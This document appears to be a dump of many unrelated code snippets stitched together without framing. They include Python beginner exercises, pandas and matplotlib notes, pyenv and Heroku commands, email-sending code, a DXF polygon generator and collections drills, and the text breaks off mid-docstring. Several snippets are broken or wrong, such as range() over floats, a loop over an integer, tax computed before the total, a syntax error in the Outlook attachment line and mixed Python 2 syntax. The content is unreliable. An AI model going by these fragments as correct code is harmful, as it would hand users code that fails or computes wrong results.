#Notice that binary and hexadecimal use prefixes to identify the number system. All integer #prefixes are in the form 0?, in which you replace ? with a character that refers to the number #system:

# b: binary (base 2)
# o: octal (base 8)
# d: decimal (base 10)
# x: hexadecimal (base 16)
import pandas as pd
s = pd.Series(list('abca'))
pd.get_dummies(s)
Out[]: 
     a    b    c
0  1.0  0.0  0.0
1  0.0  1.0  0.0
2  0.0  0.0  1.0
3  1.0  0.0  0.0
credits = 118
gpa = 2.0

if credits>=120 or gpa>=2.0:
  print("You have met at least one of the requirements.")
export PATH="$HOME/.pyenv/bin:$PATH"
export PATH="/usr/local/bin:$PATH"

eval "$(pyenv init -)"
eval "$(pyenv virtualenv-init -)"
export LDFLAGS="-L/usr/local/opt/zlib/lib -L/usr/local/opt/bzip2/lib"
export CPPFLAGS="-I/usr/local/opt/zlib/include -I/usr/local/opt/bzip2/include"
x = 20
y = 20

# Write the first if statement here:
if x==y:
   print("These numbers are the same")
print(type(your_data_variable))
https://www.codecademy.com/courses/learn-python-3/articles/python3-user-input
#1
lovely_loveseat_description="""Lovely Loveseat. Tufted polyester blend on wood. 32 inches high x 40 inches wide x 30 inches deep. Red or white."""
lovely_loveseat_price=254.00
#2
stylish_settee_description="""Stylish Settee. Faux leather on birch. 29.50 inches high x 54.75 inches wide x 28 inches deep. Black."""
stylish_settee_price=180.50
#3
luxurious_lamp_description="""Luxurious Lamp. Glass and iron. 36 inches tall. Brown with cream shade."""
luxurious_lamp_price=52.15
#4
sales_tax=0.088
customer_one_total=0
customer_one_itemization = ""
#5
customer_one_itemization+=customer_one_itemization+lovely_loveseat_description

customer_one_tax=customer_one_total*sales_tax
customer_one_total=customer_one_total+lovely_loveseat_price+luxurious_lamp_price+customer_one_tax


print("Customer One Items:")
print(customer_one_itemization)
print("Customer One Total:")
print(customer_one_total)

#output Customer One Items:
#Lovely Loveseat. Tufted polyester blend on wood. 32 inches high x 40 inches wide x 30 inches deep. #Red or white.
#Customer One Total:
#306.15
print("FFFFF  M     M")
print("F      MM   MM")
print("FFF    M  M  M")
print("F      M     M")
print("F      M     M")
print("F      M     M")

#https://content.codecademy.com/courses/learn-cpp/hello-world/block-letters-hint.png
total_cost = 5
total_cost += 10
print(total_cost)

#output 15
# Assign the string here
to_you = """Stranger, if you passing meet me and desire to speak to me, why
  should you not speak to me?
And why should I not speak to you?"""


print(to_you)
string1 = "The wind, "
string2 = "which had hitherto carried us along with amazing rapidity, "
string3 = "sank at sunset to a light breeze; "
string4 = "the soft air just ruffled the water and "
string5 = "caused a pleasant motion among the trees as we approached the shore, "
string6 = "from which it wafted the most delightful scent of flowers and hay."

# Define message below:
message=string1+string2+string3+string4+string5+string6

print(message)
#You’re trying to divide a group into four teams. All of you count off, and you get number 27.

#Find out your team by computing 27 modulo 4. Save the value to my_team.
#example:
print(29 % 5)
# it returns 4, why that? Because if you divide 29/5 you obtain 5 with the remaining of 4 
# example 
my_team=(27%4)
print(my_team)
#output is 3

# to find out the team in each groups 
person = 0

while(person < 28):
  person = person + 1
  print("Person ", str(person), "= Team ", str(person % 4))
sorted_dict = {k: unsort_dict[k] for k in sorted(unsort_dict.keys())}
>>> A = {'a':1, 'b':2, 'c':3}
>>> B = {'b':3, 'c':4, 'd':5}
>>> c = {x: A.get(x, 0) + B.get(x, 0) for x in set(A).union(B)}
>>> print(c)

{'a': 1, 'c': 7, 'b': 5, 'd': 5}
try:
    server = smtplib.SMTP(settings.email.smtp_server, settings.email.port)
    server.ehlo() # Can be omitted
    server.starttls(context=context) # Secure the connection
    server.ehlo() # Can be omitted
    server.login(settings.email.sender_email, settings.email_password)
    server.sendmail(settings.email.sender_email, receiver, message.format(number=transactions_processed, code=user_identifier))
    logger.info("Email sent to {name}", name=user)
except Exception as e:
    logger.error(e)
finally:
    server.quit()
git push heroku master # deploy to heroku

heroku addons:create heroku-postgresql:hobby-dev # create postgres db in heroku app
heroku run python # run python repl with heroku
from app import db
db.create_all()

heroku pg:psql # db shell

heroku run python manage.py db upgrade --app name_of_your_application # upgrade db to heroku
heroku local # run locally on heroku and debug
df['col'] = pd.to_datetime(df['col'])
m = float(input("number 1"))
n = float(input("number 2"))

i = 0
for i in range(m, n+1):
	i += 1

for i in range(n, m+1):
	i += 1
value = int(input("write a number: "))

t = []
i = 0
for i in value:
	i += 1
	t.append(i)

string = " ".join([str(i) for i in t])
print(string)
# Instaling "random"...
import random

# Asking to the computer to generate random numbers...
random.seed()
x = random.random()
import win32com.client as win32

outlook = win32.Dispatch('outlook.application')
mail = outlook.CreateItem(0)
mail.To = 'email.here@email.com'
#mail.CC = "more email addresses here"
#mail.BCC = "more email addresses here"
mail.Subject = 'Write subject here'
mail.Body = 'Hi Receipient,\n\nPlease find the file attached.\n\nRegards,\nSender'
attachment  = FileLocation +'/filename.xlsx'.
mail.Attachments.Add(attachment)
mail.Send()
import datetime as dt
import os

#Folder Creation
Directory = 'C:/Users/Username/Desktop'
now = dt.datetime.now()
CompletedFor = now + relativedelta(months=+1)
CompletedForNumber = CompletedFor.month
CompletedForWord = CompletedFor.strftime('%B')
FollowingMonth = "{}. {}".format(CompletedForNumber, CompletedForWord)
os.makedirs(Directory + FollowingMonth)

###Creating Date for File Name
Today = dt.datetime.now()
ContactDate = Today.replace(day=1) + relativedelta(months=+2) - relativedelta(days=1)
ContactDate = ContactDate.strftime('%d%B')

#Exporting to one excel file with two sheets with end of following month in name
SaveLocation = Directory + FollowingMonth
os.chdir(SaveLocation)
writer = pd.ExcelWriter('ThisIsTheFIle' + ContactDate + '.xlsx',engine='xlsxwriter')  
Sheet1_df.to_excel(writer, sheet_name='Sheet1', index=False)
Sheet2_df.to_excel(writer, sheet_name='Sheet2', index=False)
writer.save()
import re

def Phone_Number(s):
    s = str(s)
    s = s.translate(str.maketrans("", "", ",.-'\"():|*`;+/!&?$°@#"))
    s.replace('\.0', '')
    s = re.sub('\D', '', s)
    Prefixes = ["353", "00353", "0353", "00", "01" , "021", "022", "023", "024", "025", "026",
                "027", "028", "029", "0402", "0404", "041", "042", "043", "044", "045", "046",
                "047", "048", "049", "0504", "0505", "051", "052", "053", "056", "057", "058", 
                "059", "061", "062", "063", "064", "064", "065", "066", "067", "068", "069",
                "071", "074", "090", "091", "093", "094", "095", "096", "097", "098", "099" ]
    for n in Prefixes:
        if s.startswith(n):
            s = s.replace(n,"")
    if s.startswith('8') == True and len(s) == 9:
      s = '0' +s
    if len(s) < 6:
        s = ""
    if len(s) > 10:
        s = ""
    Contains = ['00000', '123456']
    if any(c in s for c in Contains):
        s = ""     
    return s
def County_Extract(address):
    counties_list = ['Carlow','Cavan','Clare', 'Cork', 	  
                     'Donegal','Dublin','Galway','Kerry','Kildare','Kilkenny',
                     'Laois','Leitrim','Limerick','Longford','Louth','Mayo',     
                     'Meath','Monaghan','Offaly','Roscommon','Sligo',
                     'Tipperary','Waterford','Westmeath',
                     'Wexford','Wicklow']
    
	county_match = ''
    old_find_index = 0

    for county in counties_list:
          
          find_index = address.upper().rfind(county.upper())
          if find_index > old_find_index:
               county_match = county
               old_find_index = find_index

    if old_find_index != 0:
            CorrectCounty = county_match
    else:
            CorrectCounty = "Unknown"
    return(CorrectCounty)  
for p in ax.patches:
    values = '{:.0f}'.format(p.get_height())
    x = p.get_x() + p.get_width()/2
    y = p.get_height()
    ax.annotate(values, (x, y),ha='center', va ='bottom', fontsize = 10)
.apply(lambda x: x.replace(',',',').replace(',',',').split(',')
# python general ----------------------------------------------------------------------------------------

#variables changed in a function are partly unchanged; tired it with np array -> unchanged; list -> changed - outside of the function

# dataframes ------------------------------------------------------------------------------------------------

# pd.set_option('display.max_rows', 500)


# list_mcc = df_mcc_sum['mcc'][:20].values slicing dataframes
#syntax: df[slice/list or single column_name][slice of integer positions of rows]
# this works as well: df[slice of integer positions of rows] ... selects the rows for the whole df

# df.loc[slice/list or sthg of row labels, slice/list of column labels] ... these are really the labels, not the integer positions
# df.iloc[slice/list single intger row position, slice/list or single integer column position] 0-based indexing. When slicing, the start bound is included, while the upper bound is excluded.


# def is_hot_dry(temp, humid):
#     if (temp > 0.8) & (humid < -0.5):
#         return 1
#     else:
#         return 0
# df['hot'] = df.apply(lambda x: is_hot_dry(x['avgTemp'], x['avgHumidity']), axis =  1) put output of function with 2 df columsn as arguments into new column

# group df by 1 column and get a new df for which you specify how the columns are aggregated
# column_list = ['city_id',  'purchases', '_year', '_month', '_day', '_date', 'Transaktionscode', 'MCC',  'umsatz', 'online', 'mobilfunker']
# agg_dict = { 'city_id': 'first',  'purchases': 'sum', '_year': 'first', '_month': 'first', '_day': 'first', '_date': 'first', 'Transaktionscode': 'first', 'MCC': 'first',  'umsatz': 'sum', 'online': 'first', 'mobilfunker': 'first' }
# df = df.groupby('_date')[column_list].agg( agg_dict ).reset_index(drop=True)

#df = df.loc[ df['Merchantname'].str.contains('Shop', case=False) ] loc on part of string ignoring upper and lower case
#df = df.loc[ ~df['Merchantname'].str.contains('Shop', case=False) ] same for excluding these elements



# df_shop = df_join_weekday.loc[ df_join['dealerID_Long'] == 2870000, 'dealerID_Long':'wind' ]
# gb_join_weekday = df_join.groupby('weekday')['purchases'].sum()
# gb_weekday.plot(kind='bar')
# gb_weekday = df.groupby('_month')[['purch_ga_hvv_res','purch_ae_access_bbi','purch_ga_netcube']].sum().plot(kind='bar') more than 1 bar per group
# df_agg.set_index("dealerID_Long", inplace=True)
# print(df_orig.groupby('DealerID_Long').count()) count unique values in dataframe column
# df.purchases.sum(axis=0) sum over 1 column
# df_cat = df_date.loc[ (df_date['Kategorie'] == 'None') | (df_date['Kategorie'].isnull()) ] # select compley boolean statement for loc with | and & not (or, and)

# for ind,row in df_merged.iterrows(): iterating over dataframes rows and in the process adding values to a new column
#     df_merged.loc[ind,'new-column_name'] = counter

# df_shop_station_match = pd.DataFrame(columns=[ 'city_id', '_city_name', 'Dealer_latitude','Dealer_longitude', 'dealer_name', 'DealerID_Long'])
# df_shop_station_match.loc[counter] = [close_city_id, close_city_name, row['Dealer_latitude'],row['Dealer_longitude'], row['dealer_name'], row['DealerID_Long']]
    # using loc to iteratively fill a dataframe

# df_city.loc[ : , new_target_name ] = pd.Series(new_target_data[:,0], index=df_city.index) using loc for filling a df column with a numpy array

# df_east_1.loc[:, 'holiday_week'] = df_east_1['calendar_week'].values - 26 # setting values for new column with another column
# df['kda'] = np.where(df['deaths']>0, (df['kills'] + df['assists']) / df['deaths'], df['kills'] + df['assists']) # set new column values with condition on old column

#df.loc[:, target_variable] = df[target_name_list].sum(axis=1) new column as sum of several other columns


# df_new = df_f.iloc[0:0] erase all data in a dataframe

# df_new = df.iloc[0:0] 
# df_new.loc[:,'A'] = df.loc[:,'A'] copy values for the whole column from df to df new; also copies index from df

#corrMatrix = df_shop.corr() 
#sns.heatmap(corrMatrix,annot=True)
# bottom, top = ax.get_ylim()
# ax.set_ylim(bottom + 0.5, top - 0.5)

# pd.plotting.scatter_matrix(df)
# pd.plotting.autocorrelation_plot(df_f[variable_to_plot])


#corrList = df_join_weekday.corr()['purchases'][1:] only correlation with 1 variable
#corrList.plot(kind='bar')

# dum = df.groupby( ['_year','_weekday'] )['purchases_total'].sum().unstack(level=0) plot heatmap of data grouped by 2 attributes
# sns.heatmap(dum, cmap='viridis',annot=True)
# bottom, top = ax.get_ylim()
# ax.set_ylim(bottom + 0.5, top - 0.5)

# df_city.plot(x='_date', y=target_variable, style='.') point plot with datetime x axis (parse dates in read statement); not possible to use c= column
# style format = marker line color '.-g'

# df.boxplot('in_count_mall', by='_month') # box plot a dataframe


#plotting ------------------------------------------------------------------------------------------------

# fig, axs = plt.subplots(1,3)
# axs[0].scatter(x,y)
# axs[0].set(xlabel='x', ylabel='y')

#scatter plot with trend line:
# xString = 'unixTime'
# yString = 'purchases'
# x=df_join_weekday[xString]
# y=df_join_weekday[yString]
# plt.scatter(x, y)
# plt.xlabel(xString)
# plt.ylabel(yString)
# z = np.polyfit(x, y, 1)
# p = np.poly1d(z)
# plb.plot(x, p(x), 'm-')
# plt.show()

# pd.plotting.scatter_matrix(df_draw, alpha=0.2, figsize=(10, 10),diagonal='kde') # plotting a scatter matrix from a data frame
# plt.show()

# plot all columns of df with labels and stuff
#df_weather.plot('DATE')

# plot all the columns of a groupby object (= without selection of a column after ('_weekday'))
# gb = df.groupby('_weekday').count()

# for i in range(6): plotting several subplots in 1 figure
#     ax = plt.subplot(3, 2, i+1)
#     df.plot.scatter(x=column_list[i],y='purchases_mall',c='_weekday', colormap = 'viridis', ax=ax)

# fig, ax = plt.subplots()
# for name, group in df.groupby('_year'):
#     group.plot(x='day_year', y='purchases_total', ax=ax, label=name) plot values of a column grouped by values of another column into a single plot

# df['N'].hist(by=df['Letter']) hists of column N grouped by the column letter - seperate hist for each letter

# gb = df.groupby(['Kategorie','_month'],as_index='False')[['purchases']].sum()
# gb.unstack(level=0).plot(kind='bar', subplots=True) plot multiindex dataframe from line above as barplot with several subplots

# fig, ax1 = plt.subplots() plot a second column with seperate y axis in same plot
# ax2 = ax1.twinx()  # instantiate a second axes that shares the same x-axis
# df.plot(x='_date', y= 'in_counts', ax = ax1, color = 'tab:blue')
# df.plot(x='_date', y= 'avgTemp', ax = ax2, color = 'tab:red')
# plt.show()

# df.plot(y = 'in_counts', ax = ax1, color = 'tab:blue', use_index = True) plot column vs index


# params = {'font.size': 10, #adjusting plot properties
#         'legend.fontsize': 'xx-small',
#         'axes.labelsize': 'xx-small',
#         'axes.titlesize':'xx-small',
#         'xtick.labelsize':'xx-small',
#         'ytick.labelsize':'xx-small'}
# plt.rcParams.update(params)
# plt.subplots_adjust(wspace=0.4, hspace=0.4) # width and height space
# plt.savefig( pltString, dpi=300 )

# fit data with self defined function
# from scipy.optimize import curve_fit 
# def func(x, a, b, c):
#     return a / x + b + c * x
# popt, pcov = curve_fit(func, df['shop_sum_scaled'], df['in_buy_ratio'])
# plt.plot(df['shop_sum_scaled'], func(df['shop_sum_scaled'], *popt), 'r.')


# datetime stuff ---------------------------------------------------------

# date_list = df['_date'].unique()  select unique dates and convert to pandas datetime
# date_list = pd.to_datetime(date_list)

# or date_list = date_list.astype('M8[D]')

# import matplotlib.dates as mdates #formatting date axis
# months = mdates.MonthLocator()
# days = mdates.DayLocator(interval = 10)
# months_fmt = mdates.DateFormatter('%Y-%m')
# days_fmt = mdates.DateFormatter('%d')
# ax.xaxis.set_major_locator(months)
# ax.xaxis.set_minor_locator(days)
# ax.xaxis.set_major_formatter(months_fmt)
# ax.xaxis.set_minor_formatter(days_fmt)


# Lists -----------------------------------------------------------------------------------------------

# list_not_mall = [sum(a) for a in zip(list_urban, list_periphery)] elementwise summation of 2 lists
# sort_ind[-10:] last 10 elemnts of numpy array
# a = [2 if x < 4 else x for x in a ]
# b = [2 for x in a if x < 4]

# new_infections = [y - x for x,y in zip(tot_infections,tot_infections[1:])] # subtract preious element in list


# groupby -----------------------------------------------------------------------------------------------------------

# df.groupby(pd.cut( df["avgTemp"], np.arange(15, 40, 5) ))['purchases_mall'].mean() groupby numerical value (avgTemp)


# dicts -------------------------------------------------------------------

# {key: value for (key, value) in iterable}

# statistics ----------------------------------------------------------------

# r, pval_p = stat.pearsonr(df['in_counts'].values, df['purchases5651'].values)
# print('pearson r:', r, 'pearson pval:', pval_p)

# rho, pval = stat.spearmanr(df['in_counts'].values, df['purchases5651'].values)
# print('spearman rho:', rho, 'spearman pval:', pval )


# strings -------------------------------------------------------------------

# axs[2].set_title('pearson_r: ' + str( np.around(r1,3) ) + ' , p_val: ' +  '{:.1e}'.format(pval_p3) )
df_cliente.groupby([df_cliente['dt_transacao'].dt.date]).mean()
from itertools import cycle
from shutil import get_terminal_size
from threading import Thread
from time import sleep


class Loader:
    def __init__(self, desc="Loading...", end="Done!", timeout=0.1):
        """
        A loader-like context manager

        Args:
            desc (str, optional): The loader's description. Defaults to "Loading...".
            end (str, optional): Final print. Defaults to "Done!".
            timeout (float, optional): Sleep time between prints. Defaults to 0.1.
        """
        self.desc = desc
        self.end = end
        self.timeout = timeout

        self._thread = Thread(target=self._animate, daemon=True)
        self.steps = ["⢿", "⣻", "⣽", "⣾", "⣷", "⣯", "⣟", "⡿"]
        self.done = False

    def start(self):
        self._thread.start()
        return self

    def _animate(self):
        for c in cycle(self.steps):
            if self.done:
                break
            print(f"\r{self.desc} {c}", flush=True, end="")
            sleep(self.timeout)

    def __enter__(self):
        self.start()

    def stop(self):
        self.done = True
        cols = get_terminal_size((80, 20)).columns
        print("\r" + " " * cols, end="", flush=True)
        print(f"\r{self.end}", flush=True)

    def __exit__(self, exc_type, exc_value, tb):
        # handle exceptions with those variables ^
        self.stop()


if __name__ == "__main__":
    with Loader("Loading with context manager..."):
        for i in range(10):
            sleep(0.25)

    loader = Loader("Loading with object...", "That was fast!", 0.05).start()
    for i in range(10):
        sleep(0.25)
    loader.stop()
op=get_operator()
try:
  if "Not Registered" in op:
     print "No Signal"
  else:
     print "Operator Name: " + op
except:
  print("Error occored")
#extract list of tickers from screener
tickers = []
for item in screener:
    tickers.append(item['symbol'])

#extract list of sectors from screener
sectors = []
for item in screener:
    sectors.append(item['sector'])

#extract list of industries from screener
industries = []
for item in screener:
    industries.append(item['industry'])

#extract list of companies from screener
name = []
for item in screener:
    name.append(item['companyName'])
#url to retrieve company tickers

url = (f'https://financialmodelingprep.com/api/v3/stock-screener?marketCapMoreThan=10000000000&volumeMoreThan=10000&apikey={api}')

#call api and convert to json
screener = requests.get(url).json()
import pandas as pd
import numpy as np
from openpyxl import load_workbook

path = r"C:\Users\fedel\Desktop\excelData\PhD_data.xlsx"

book = load_workbook(path)
writer = pd.ExcelWriter(path, engine = 'openpyxl')
writer.book = book

x3 = np.random.randn(100, 2)
df3 = pd.DataFrame(x3)

x4 = np.random.randn(100, 2)
df4 = pd.DataFrame(x4)

df3.to_excel(writer, sheet_name = 'x3')
df4.to_excel(writer, sheet_name = 'x4')
writer.save()
writer.close()
import numpy as np
import pandas as pd
import perfplot

perfplot.save(
    "out.png",
    setup=lambda n: pd.DataFrame(np.arange(n * 3).reshape(n, 3)),
    n_range=[2**k for k in range(25)],
    kernels=[
        lambda df: len(df.index),
        lambda df: df.shape[0],
        lambda df: df[df.columns[0]].count(),
    ],
    labels=["len(df.index)", "df.shape[0]", "df[df.columns[0]].count()"],
    xlabel="Number of rows",
)
# Connecting the drive with the colab kernel...
from google.colab import drive
drive.mount('/content/drive')
a, b = 1,0

try:
    print(a/b)
    # exception raised when b is 0
except ZeroDivisionError:
    print("division by zero")
else:
    print("no exceptions raised")
finally:
    print("Run this always")
view raw
from collections import Counter

str_1, str_2, str_3 = "acbde", "abced", "abcda"
cnt_1, cnt_2, cnt_3  = Counter(str_1), Counter(str_2), Counter(str_3)

if cnt_1 == cnt_2:
    print('1 and 2 anagram')
if cnt_1 == cnt_3:
    print('1 and 3 anagram')
# finding frequency of each element in a list
from collections import Counter

my_list = ['a','a','b','b','b','c','d','d','d','d','d']
count = Counter(my_list) # defining a counter object

print(count) # Of all elements
# Counter({'d': 5, 'b': 3, 'a': 2, 'c': 1})

print(count['b']) # of individual element
# 3

print(count.most_common(1)) # most frequent element
# [('d', 5)]
my_string = "abcba"

if my_string == my_string[::-1]:
    print("palindrome")
else:
    print("not palindrome")

# Output
# palindrome
list_of_strings = ['My', 'name', 'is', 'Chaitanya', 'Baweja']

# Using join with the comma separator
print(','.join(list_of_strings))

# Output
# My,name,is,Chaitanya,Baweja
string_1 = "My name is Chaitanya Baweja"
string_2 = "sample/ string 2"

# default separator ' '
print(string_1.split())
# ['My', 'name', 'is', 'Chaitanya', 'Baweja']

# defining separator as '/'
print(string_2.split('/'))
# ['sample', ' string 2']
# Multiplying each element in a list by 2

original_list = [1,2,3,4]

new_list = [2*x for x in original_list]

print(new_list)
# [2,4,6,8]
n = 3 # number of repetitions

my_string = "abcd"
my_list = [1,2,3]

print(my_string*n)
# abcdabcdabcd

print(my_list*n)
# [1,2,3,1,2,3,1,2,3]
'''
Autor: Antonio de Jesús Anaya Hernández
Github: @kny5
Program: Parametric polygon shape generator for laser cutting with kerf and dxf output.

'''
import math
import ezdxf
import random

# Parameters
sides = random.randrange(3, 10, 1)
radius = 40
origin = (100,100)
slot_depth = radius/2
kerf = 0.2
material_thickness = 5

class dxf_file():
    def __init__(self, __filename):
        self.filename = __filename
        self.file = None
        self.create_dxf()

    def create_dxf(self):
        self.file = ezdxf.new('R2018')
        self.file.saveas(self.filename)

    def save_dxf(self):
        self.file.saveas(self.filename)

    def add_vectors_dxf(self, vectors):
        self.model = self.file.modelspace()
        for vector in vectors:
            self.model.add_line(vector[0], vector[1])
            self.save_dxf()


def rotate_point(point, pivot, angle):
    x = ((point[0] - pivot[0]) * math.cos(angle)) - ((point[1] - pivot[1]) * math.sin(angle)) + pivot[0]
    y = ((point[0] - pivot[0]) * math.sin(angle)) + ((point[1] - pivot[1]) * math.cos(angle)) + pivot[1]
    return (x, y)


def line_intersection(line1, line2):
    xdiff = (line1[0][0] - line1[1][0], line2[0][0] - line2[1][0])
    ydiff = (line1[0][1] - line1[1][1], line2[0][1] - line2[1][1])

    def det(a, b):
        return a[0] * b[1] - a[1] * b[0]

    div = det(xdiff, ydiff)
    if div == 0:
       raise Exception('lines do not intersect')

    d = (det(*line1), det(*line2))
    x = det(d, xdiff) / div
    y = det(d, ydiff) / div
    return (x, y)


class workspace():
    def __init__(self, __origin=(0,0), __width=1000, __height=1000):
        self.origin = __origin
        self.width = __width
        self.height = __height
        self.objects = []

    def add_object(self, __object):
        self.objects.append(__object)
        # Should I sort this?


class polygon():
    def __init__(self, __origin, __sides, __radius, __kerf=kerf):
        self.kerf = __kerf
        self.sides = __sides
        # kerf parameter
        self.radius = __radius + self.kerf
        self.origin = __origin
        self.points = []
        self.vectors = []
        self.angle = 360/self.sides
        self.make()
        self.get_vectors()

    def make(self):
        for side in range(0, self.sides):
            __x = self.origin[0] + self.radius * math.cos(2 * math.pi * side / self.sides)
            __y = self.origin[1] + self.radius * math.sin(2 * math.pi * side / self.sides)
            self.points.append((__x, __y))

    def get_vectors(self):
        self.vectors = list(zip(self.points, self.points[1:] + self.points[:1]))

    def slot(self, __width, __depth):

        # kerf parameter
        width = __width - self.kerf
        depth = __depth - self.kerf
        # Define points of slot shape:
        __a = (self.origin[0] + self.radius - depth, self.origin[1] - (width / 2))
        __b = (self.origin[0] + self.radius - depth, self.origin[1] + (width / 2))
        __c = (self.origin[0] + self.radius, self.origin[1] + (width / 2))
        __d = (self.origin[0] + self.radius, self.origin[1] - (width / 2))

        # Set initial position rotate to initial position
        __a = rotate_point(__a, self.origin, math.radians(self.angle / 2))
        __b = rotate_point(__b, self.origin, math.radians(self.angle / 2))
        __c = rotate_point(__c, self.origin, math.radians(self.angle / 2))
        __d = rotate_point(__d, self.origin, math.radians(self.angle / 2))

        # packing slot sides
        slot_left_side_1 = (__b, __c)
        slot_right_side_1 = (__a, __d)

        # finding intersection point between slot sides and polygon face 1
        right_inter = line_intersection(self.vectors[0], slot_right_side_1)
        left_inter = line_intersection(self.vectors[0], slot_left_side_1)

        # Manually ordering the points of the slot shape
        output = [self.points[0]]
        output.append(right_inter)
        output.append(__a)
        output.append(__a)
        output.append(__b)
        output.append(__b)
        output.append(left_inter)
        # index 7

        # repeating the process radially for the number of faces.
        for side in range(1, self.sides):
            output.append(rotate_point(self.points[0], self.origin, math.radians(side * self.angle)))
            output.append(rotate_point(right_inter, self.origin, math.radians(side * self.angle)))
            output.append(rotate_point(__a, self.origin, math.radians(side *self.angle)))
            output.append(rotate_point(__a, self.origin, math.radians(side *self.angle)))
            output.append(rotate_point(__b, self.origin, math.radians(side *self.angle)))
            output.append(rotate_point(__b, self.origin, math.radians(side *self.angle)))
            output.append(rotate_point(left_inter, self.origin, math.radians(side * self.angle)))

        # creating a vector list from the points list
        self.output = list(zip(output, output[1:] + output[:1]))


# program test

# creating a random generated polygon
a = polygon(origin, sides, radius)
a.slot(material_thickness, slot_depth)

# creating a DXF document and adding slot output vectors
dxf_file_ = dxf_file("test.dxf")
a.get_vectors()
dxf_file_.add_vectors_dxf(a.output)
def permutationCipher(password, key):
    table = password.maketrans('abcdefghijklmnopqrstuvwxyz', key)
    return password.translate(table)
def isWordPalindrome(word):
    print(word[-1:0])
    return word == word[::-1]
def func(x):
    return "something" if x == 0 else "something else"
def get_batch(vectorized_songs, seq_length, batch_size):
  # the length of the vectorized songs string
  n = vectorized_songs.shape[0] - 1
  # randomly choose the starting indices for the examples in the training batch
  idx = np.random.choice(n-seq_length, batch_size)

  '''TODO: construct a list of input sequences for the training batch'''
  input_batch = [vectorized_songs[i:i+seq_length] for i in idx]# TODO
  '''TODO: construct a list of output sequences for the training batch'''
  output_batch = [vectorized_songs[i+1:i+seq_length+1] for i in idx] # TODO

  # x_batch, y_batch provide the true inputs and targets for network training
  # print(input_batch, output_batch)
  x_batch = np.reshape(input_batch, [batch_size, seq_length])
  y_batch = np.reshape(output_batch, [batch_size, seq_length])
  return x_batch, y_batch
import sqlite3


class DatabaseConnection:
    def __init__(self,host):
        self.connection = None
        self.host = host

    def __enter__(self):
        self.connection = sqlite3.connect(self.host)
        return self.connection

    def __exit__(self, exc_type, exc_val, exc_tb): #parameters in case of exception
        if exc_tb or exc_val or exc_type: # if one of thos erros happen
            self.connection.close()
        else:
            self.connection.commit()
            self.connection.close()
from collections import defaultdict, OrderedDict, namedtuple, deque


def task1() -> defaultdict:
    """
    - create a `defaultdict` object, and its default value would be set to the string `Unknown`.
    - Add an entry with key name `Alan` and its value being `Manchester`.
    - Return the `defaultdict` object you created.
    """
    # you code starts here:
    val = 'Unknown'
    dd = defaultdict(lambda: val)
    dd['Alan'] = 'Manchester'

    return dd




def task2(arg_od: OrderedDict):

  #  - takes in an OrderedDict `arg_od`
   # - Remove the first and last entry in `arg_od`.
  arg_od.popitem()
  arg_od.popitem(False)
    #- Move the entry with key name `Bob` to the end of `arg_od`.
  arg_od.move_to_end('Bob')
    #- Move the entry with key name `Dan` to the start of `arg_od`.
  arg_od.move_to_end('Dan',False)
    #- You may assume that `arg_od` would always contain the keys `Bob` and `Dan`,
    #   and they won't be the first or last entry initially.






def task3(name: str, club: str) -> namedtuple:
    """
    - create a `namedtuple` with type `Player`, and it will have two fields, `name` and `club`.
    - create a `Player` `namedtuple` instance that has the `name` and `club` field set by the given arguments.
    - return the `Player` `namedtuple` instance you created.
    """
    # you code starts here:
    Player =namedtuple('Player', ['name', 'club'])
    player = Player(name, club)

    return player




def task4(arg_deque: deque):
    """
    - Manipulate the `arg_deque` in any order you preferred to achieve the following effect:
        -- remove last element in `deque`
        -- move the fist (left most) element to the end (right most)
        -- add an element `Zack`, a string, to the start (left)
    """
    arg_deque.pop()  # remove last element
    arg_deque.append(arg_deque.popleft())  # remove first element and append it to last
    arg_deque.appendleft('Zack')  # add Zack to start
class Car:
  def __init__(self,make,model):
    self.make =make
    self.model = model

  def __repr__(self):
    return f'<car {self.make} {self.model}>'


class Garage:
  def __init__(self):
    self.cars = []
    
  def __len__(self):
      return len(self.cars)
  
  def add_car(self,car):
    if not isinstance(car,Car):# accept only clss obcject clas car
      raise TypeError(f'Tried to add `car.__class__.__name__ to the garage but you can only add car object')
    self.cars.append(car)
    #raise NotImplemented('We cant add catss to the garage yet')# you create a new error of type notimplemented error 



ford =Garage()
car = Car('Ford','Fiesta')

ford.add_car(car)
print(len(ford))
# ANY - if any element evaluate to true
# ALL - if all elements evaluete to true

friends = [
    {'name': 'Rolf', 'Location': 'Warszawa'},
    {'name': 'Piotr', 'Location': 'Warszawa'},
    {'name': 'Marek', 'Location': 'Warszawa'},
    {'name': 'Tomasz', 'Location': 'Kraków'},
    {'name': 'Zenek', 'Location': 'Warszawa'},
    {'name': 'Stanislaw', 'Location': 'Warszawa'}

]

yourlocation = input('Where are u?')

friends_nearby = [friend for friend in friends if friend['Location'] == yourlocation ]

if any(friends_nearby): # if there is at least one and False if empty
    print("u are not alone")

if all(friends_nearby):
    print("u are not alone")


#Values that evaluate to false

"""
0 , 0.0 ...
none
[] () {}
False
"""

#print(bool(0))


print(all([1, 2, 3, 4, 5]))
print(all([0, 1, 2, 3, 4, 5]))
def transform_text(text: str) -> str:
    transform_text = ""
    for _index, _char in enumerate(text):
        if _index % 2:
            transform_text += _char.upper()

        else:
            transform_text += _char.lower()

    return transform_text


def display_vertical_text(text: str):
    for _char in text:
        print(_char)




if __name__ == "__main__":
    _text = "Hellow World"
    out = transform_text(text=_text)
    display_vertical_text(out)
#functions that accepts other functions as parameter

def greet():
    print('Hello')

def before_and_after(func):
    print('Before')
    func()
    print('After')

#before_and_after(greet)


#before_and_after(lambda: 5)


books = [
    {'name': 'Matrix', 'Director': 'Wahowski'},
{'name': 'Matrix2', 'Director': 'Wahowski'},
{'name': 'Ogniem I mieczem', 'Director': 'WAJDA'},
{'name': 'Chlopi', 'Director': 'Rejmond'},
{'name': 'QV', 'Director': 'Sienkiewicz'},
{'name': 'LORD', 'Director': 'Tolkien'}

]

def find_book(expected,finder):
    list = []
    for book in books:
        if finder(book) == expected:
            list.append(book)

    return list





find_by = input('What property are u searching by?')
looking_for = input('What are u looking for?')

book = find_book(looking_for ,lambda book: book[find_by])

print(book or 'No mowies found')
import logging

logging.basicConfig(
    format='%(asctime)s %(levelname) -8s [%(filename)s:%(lineno)d]  %(message)s',
    level=logging.DEBUG,
    datefmt= '%Y-%m-%d %H:%M:%S',
    filename= 'log.txt'
)

#s - turn it to a string

logger = logging.getLogger('test_log')

logger.info('This will not show up')
logger.warning('This will')
logger.error('this is error')
logger.critical('Critical error')


"""
DEBUG
INFO

#those show up by default
WARNING
ERROR
CRITICAL

"""
"""
Our definition of a secure filename is:
